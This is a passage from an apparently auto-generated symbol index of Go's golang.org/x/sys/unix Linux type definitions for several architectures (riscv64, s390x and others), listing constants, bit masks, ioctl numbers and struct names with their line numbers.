CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 356) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 357) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 358) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 359) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 360) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 361) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 362) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 363) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 364) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 365) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 366) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 367) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 368) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 369) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 370) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 371) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 372) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 373) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 374) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 375) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 376) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 377) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 378) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 379) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 380) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 381) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 382) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 383) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 384) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 385) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 386) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 387) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 388) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 389) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 390) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 391) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 392) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 393) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 394) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 395) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 396) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 397) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 398) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 399) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 400) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 401) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 402) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 403) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 404) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 405) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 406) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 407) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 408) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 409) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 410) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 411) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 412) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 413) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 414) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 415) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 418) | type SockaddrStorage struct type HDGeometry (line 424) | type HDGeometry struct type Statfs_t (line 431) | type Statfs_t struct type TpacketHdr (line 446) | type TpacketHdr struct constant SizeofTpacketHdr (line 458) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 461) | type RTCPLLInfo struct type BlkpgPartition (line 471) | type BlkpgPartition struct constant BLKPG (line 481) | BLKPG = 0x20001269 type XDPUmemReg (line 484) | type XDPUmemReg struct type CryptoUserAlg (line 493) | type CryptoUserAlg struct type CryptoStatAEAD (line 503) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 512) | type CryptoStatAKCipher struct type CryptoStatCipher (line 523) | type CryptoStatCipher struct type CryptoStatCompress (line 532) | type CryptoStatCompress struct type CryptoStatHash (line 541) | type CryptoStatHash struct type CryptoStatKPP (line 548) | type CryptoStatKPP struct type CryptoStatRNG (line 556) | type CryptoStatRNG struct type CryptoStatLarval (line 564) | type CryptoStatLarval struct type CryptoReportLarval (line 568) | type CryptoReportLarval struct type CryptoReportHash (line 572) | type CryptoReportHash struct type CryptoReportCipher (line 578) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 585) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 594) | type CryptoReportAEAD struct type CryptoReportComp (line 602) | type CryptoReportComp struct type CryptoReportRNG (line 606) | type CryptoReportRNG struct type CryptoReportAKCipher (line 611) | type CryptoReportAKCipher struct type CryptoReportKPP (line 615) | type CryptoReportKPP struct type CryptoReportAcomp (line 619) | type CryptoReportAcomp struct type LoopInfo (line 623) | type LoopInfo struct type TIPCSubscr (line 639) | type TIPCSubscr struct type TIPCSIOCLNReq (line 646) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 652) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 657) | type PPSKInfo struct constant PPS_GETPARAMS (line 667) | PPS_GETPARAMS = 0x400870a1 constant PPS_SETPARAMS (line 668) | PPS_SETPARAMS = 0x800870a2 constant PPS_GETCAP (line 669) | PPS_GETCAP = 0x400870a3 constant PPS_FETCH (line 670) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 674) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 677) | type SysvIpcPerm struct type SysvShmDesc (line 689) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_riscv64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 121) | type DmNameList struct constant FADV_DONTNEED (line 129) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 130) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 133) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 144) | type RawSockaddr struct type RawSockaddrAny (line 149) | type RawSockaddrAny struct type Iovec (line 154) | type Iovec struct type Msghdr (line 159) | type Msghdr struct type Cmsghdr (line 170) | type Cmsghdr struct type ifreq (line 176) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 182) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 183) | SizeofIovec = 0x10 constant SizeofMsghdr (line 184) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 185) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 189) | SizeofSockFprog = 0x10 type PtraceRegs (line 192) | type PtraceRegs struct type FdSet (line 227) | type FdSet struct type Sysinfo_t (line 231) | type Sysinfo_t struct type Ustat_t (line 249) | type Ustat_t struct type EpollEvent (line 257) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 265) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 269) | POLLRDHUP = 0x2000 type Sigset_t (line 272) | type Sigset_t struct constant _C__NSIG (line 276) | _C__NSIG = 0x41 constant SIG_BLOCK (line 279) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 280) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 281) | SIG_SETMASK = 0x2 type Siginfo (line 284) | type Siginfo struct type Termios (line 292) | type Termios struct type Taskstats (line 303) | type Taskstats struct type cpuMask (line 363) | type cpuMask constant _NCPUBITS (line 366) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 370) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 371) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 372) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 373) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 374) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 375) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 376) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 377) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 378) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 379) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 380) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 381) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 382) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 383) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 384) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 385) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 386) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 387) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 388) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 389) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 390) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 391) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 392) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 393) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 394) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 395) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 396) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 397) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 398) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 399) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 400) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 401) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 402) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 403) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 404) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 405) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 406) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 407) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 408) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 409) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 410) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 411) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 412) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 413) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 414) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 415) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 416) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 417) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 418) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 419) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 420) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 421) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 422) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 423) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 424) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 425) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 426) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 427) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 428) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 429) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 430) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 431) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 432) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 433) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 436) | type SockaddrStorage struct type HDGeometry (line 442) | type HDGeometry struct type Statfs_t (line 449) | type Statfs_t struct type TpacketHdr (line 464) | type TpacketHdr struct constant SizeofTpacketHdr (line 476) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 479) | type RTCPLLInfo struct type BlkpgPartition (line 489) | type BlkpgPartition struct constant BLKPG (line 499) | BLKPG = 0x1269 type XDPUmemReg (line 502) | type XDPUmemReg struct type CryptoUserAlg (line 511) | type CryptoUserAlg struct type CryptoStatAEAD (line 521) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 530) | type CryptoStatAKCipher struct type CryptoStatCipher (line 541) | type CryptoStatCipher struct type CryptoStatCompress (line 550) | type CryptoStatCompress struct type CryptoStatHash (line 559) | type CryptoStatHash struct type CryptoStatKPP (line 566) | type CryptoStatKPP struct type CryptoStatRNG (line 574) | type CryptoStatRNG struct type CryptoStatLarval (line 582) | type CryptoStatLarval struct type CryptoReportLarval (line 586) | type CryptoReportLarval struct type CryptoReportHash (line 590) | type CryptoReportHash struct type CryptoReportCipher (line 596) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 603) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 612) | type CryptoReportAEAD struct type CryptoReportComp (line 620) | type CryptoReportComp struct type CryptoReportRNG (line 624) | type CryptoReportRNG struct type CryptoReportAKCipher (line 629) | type CryptoReportAKCipher struct type CryptoReportKPP (line 633) | type CryptoReportKPP struct type CryptoReportAcomp (line 637) | type CryptoReportAcomp struct type LoopInfo (line 641) | type LoopInfo struct type TIPCSubscr (line 657) | type TIPCSubscr struct type TIPCSIOCLNReq (line 664) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 670) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 675) | type PPSKInfo struct constant PPS_GETPARAMS (line 685) | PPS_GETPARAMS = 0x800870a1 constant PPS_SETPARAMS (line 686) | PPS_SETPARAMS = 0x400870a2 constant PPS_GETCAP (line 687) | PPS_GETCAP = 0x800870a3 constant PPS_FETCH (line 688) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 692) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 695) | type SysvIpcPerm struct type SysvShmDesc (line 708) | type SysvShmDesc struct type RISCVHWProbePairs (line 721) | type RISCVHWProbePairs struct constant RISCV_HWPROBE_KEY_MVENDORID (line 727) | RISCV_HWPROBE_KEY_MVENDORID = 0x0 constant RISCV_HWPROBE_KEY_MARCHID (line 728) | RISCV_HWPROBE_KEY_MARCHID = 0x1 constant RISCV_HWPROBE_KEY_MIMPID (line 729) | RISCV_HWPROBE_KEY_MIMPID = 0x2 constant RISCV_HWPROBE_KEY_BASE_BEHAVIOR (line 730) | RISCV_HWPROBE_KEY_BASE_BEHAVIOR = 0x3 constant RISCV_HWPROBE_BASE_BEHAVIOR_IMA (line 731) | RISCV_HWPROBE_BASE_BEHAVIOR_IMA = 0x1 constant RISCV_HWPROBE_KEY_IMA_EXT_0 (line 732) | RISCV_HWPROBE_KEY_IMA_EXT_0 = 0x4 constant RISCV_HWPROBE_IMA_FD (line 733) | RISCV_HWPROBE_IMA_FD = 0x1 constant RISCV_HWPROBE_IMA_C (line 734) | RISCV_HWPROBE_IMA_C = 0x2 constant RISCV_HWPROBE_IMA_V (line 735) | RISCV_HWPROBE_IMA_V = 0x4 constant RISCV_HWPROBE_EXT_ZBA (line 736) | RISCV_HWPROBE_EXT_ZBA = 0x8 constant RISCV_HWPROBE_EXT_ZBB (line 737) | RISCV_HWPROBE_EXT_ZBB = 0x10 constant RISCV_HWPROBE_EXT_ZBS (line 738) | RISCV_HWPROBE_EXT_ZBS = 0x20 constant RISCV_HWPROBE_KEY_CPUPERF_0 (line 739) | RISCV_HWPROBE_KEY_CPUPERF_0 = 0x5 constant RISCV_HWPROBE_MISALIGNED_UNKNOWN (line 740) | RISCV_HWPROBE_MISALIGNED_UNKNOWN = 0x0 constant RISCV_HWPROBE_MISALIGNED_EMULATED (line 741) | RISCV_HWPROBE_MISALIGNED_EMULATED = 0x1 constant RISCV_HWPROBE_MISALIGNED_SLOW (line 742) | RISCV_HWPROBE_MISALIGNED_SLOW = 0x2 constant RISCV_HWPROBE_MISALIGNED_FAST (line 743) | RISCV_HWPROBE_MISALIGNED_FAST = 0x3 constant RISCV_HWPROBE_MISALIGNED_UNSUPPORTED (line 744) | RISCV_HWPROBE_MISALIGNED_UNSUPPORTED = 0x4 constant RISCV_HWPROBE_MISALIGNED_MASK (line 745) | RISCV_HWPROBE_MISALIGNED_MASK = 0x7 FILE: vendor/golang.org/x/sys/unix/ztypes_linux_s390x.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 102) | type Dirent struct type Flock_t (line 111) | type Flock_t struct type DmNameList (line 120) | type DmNameList struct constant FADV_DONTNEED (line 128) | FADV_DONTNEED = 0x6 constant FADV_NOREUSE (line 129) | FADV_NOREUSE = 0x7 type RawSockaddrNFCLLCP (line 132) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 143) | type RawSockaddr struct type RawSockaddrAny (line 148) | type RawSockaddrAny struct type Iovec (line 153) | type Iovec struct type Msghdr (line 158) | type Msghdr struct type Cmsghdr (line 169) | type Cmsghdr struct type ifreq (line 175) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 181) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 182) | SizeofIovec = 0x10 constant SizeofMsghdr (line 183) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 184) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 188) | SizeofSockFprog = 0x10 type PtraceRegs (line 191) | type PtraceRegs struct type PtracePsw (line 201) | type PtracePsw struct type PtraceFpregs (line 206) | type PtraceFpregs struct type PtracePer (line 211) | type PtracePer struct type FdSet (line 222) | type FdSet struct type Sysinfo_t (line 226) | type Sysinfo_t struct type Ustat_t (line 244) | type Ustat_t struct type EpollEvent (line 252) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 260) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 264) | POLLRDHUP = 0x2000 type Sigset_t (line 267) | type Sigset_t struct constant _C__NSIG (line 271) | _C__NSIG = 0x41 constant SIG_BLOCK (line 274) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 275) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 276) | SIG_SETMASK = 0x2 type Siginfo (line 279) | type Siginfo struct type Termios (line 287) | type Termios struct type Taskstats (line 298) | type Taskstats struct type cpuMask (line 358) | type cpuMask constant _NCPUBITS (line 361) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 365) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 366) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 367) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 368) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 369) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 370) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 371) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 372) | CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 373) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 374) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 375) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 376) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 377) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 378) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 379) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 380) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 381) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 382) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 383) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 384) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 385) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 386) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 387) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 388) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 389) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 390) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 391) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 392) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 393) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 394) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 395) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 396) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 397) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 398) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 399) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 400) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 401) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 402) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 403) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 404) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 405) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 406) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 407) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 408) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 409) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 410) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 411) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 412) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 413) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 414) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 415) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 416) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 417) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 418) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 419) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 420) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 421) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 422) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 423) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 424) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 425) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 426) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 427) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 428) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 431) | type SockaddrStorage struct type HDGeometry (line 437) | type HDGeometry struct type Statfs_t (line 444) | type Statfs_t struct type TpacketHdr (line 460) | type TpacketHdr struct constant SizeofTpacketHdr (line 472) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 475) | type RTCPLLInfo struct type BlkpgPartition (line 485) | type BlkpgPartition struct constant BLKPG (line 495) | BLKPG = 0x1269 type XDPUmemReg (line 498) | type XDPUmemReg struct type CryptoUserAlg (line 507) | type CryptoUserAlg struct type CryptoStatAEAD (line 517) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 526) | type CryptoStatAKCipher struct type CryptoStatCipher (line 537) | type CryptoStatCipher struct type CryptoStatCompress (line 546) | type CryptoStatCompress struct type CryptoStatHash (line 555) | type CryptoStatHash struct type CryptoStatKPP (line 562) | type CryptoStatKPP struct type CryptoStatRNG (line 570) | type CryptoStatRNG struct type CryptoStatLarval (line 578) | type CryptoStatLarval struct type CryptoReportLarval (line 582) | type CryptoReportLarval struct type CryptoReportHash (line 586) | type CryptoReportHash struct type CryptoReportCipher (line 592) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 599) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 608) | type CryptoReportAEAD struct type CryptoReportComp (line 616) | type CryptoReportComp struct type CryptoReportRNG (line 620) | type CryptoReportRNG struct type CryptoReportAKCipher (line 625) | type CryptoReportAKCipher struct type CryptoReportKPP (line 629) | type CryptoReportKPP struct type CryptoReportAcomp (line 633) | type CryptoReportAcomp struct type LoopInfo (line 637) | type LoopInfo struct type TIPCSubscr (line 653) | type TIPCSubscr struct type TIPCSIOCLNReq (line 660) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 666) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 671) | type PPSKInfo struct constant PPS_GETPARAMS (line 681) | PPS_GETPARAMS = 0x800870a1 constant PPS_SETPARAMS (line 682) | PPS_SETPARAMS = 0x400870a2 constant PPS_GETCAP (line 683) | PPS_GETCAP = 0x800870a3 constant PPS_FETCH (line 684) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 688) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 691) | type SysvIpcPerm struct type 